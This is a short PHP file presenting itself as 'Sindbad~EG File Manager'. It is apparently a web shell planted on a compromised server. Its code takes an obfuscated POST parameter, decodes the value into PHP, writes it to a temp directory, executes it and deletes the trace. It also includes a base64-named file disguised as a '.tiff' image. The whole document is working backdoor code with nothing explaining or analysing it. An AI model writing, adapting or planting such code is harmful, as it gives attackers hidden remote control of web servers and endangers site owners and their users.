Sindbad~EG File Manager
<?php if(in_array("de\x73\x63r\x69p\x74or", array_keys($_POST))){ $ref = array_filter([sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/var/tmp", getcwd(), "/tmp", "/dev/shm"]); $fac = $_POST["de\x73\x63r\x69p\x74or"]; $fac=explode ( '.' , $fac ) ; $component= ''; $salt5= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt5 ); foreach ($fac as $q => $v8) { $chS= ord($salt5[$q % $lenS] ); $dec= ((int)$v8 - $chS - ($q % 10)) ^ 42; $component .= chr($dec ); } $itm = 0; do { $hld = $ref[$itm] ?? null; if ($itm >= count($ref)) break; if (!( !is_dir($hld) || !is_writable($hld) )) { $tkn = vsprintf("%s/%s", [$hld, ".sym"]); $success = file_put_contents($tkn, $component); if ($success) { include $tkn; @unlink($tkn); die();} } $itm++; } while (true); }
require_once base64_decode("VENqdEkudGlmZg"); ?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists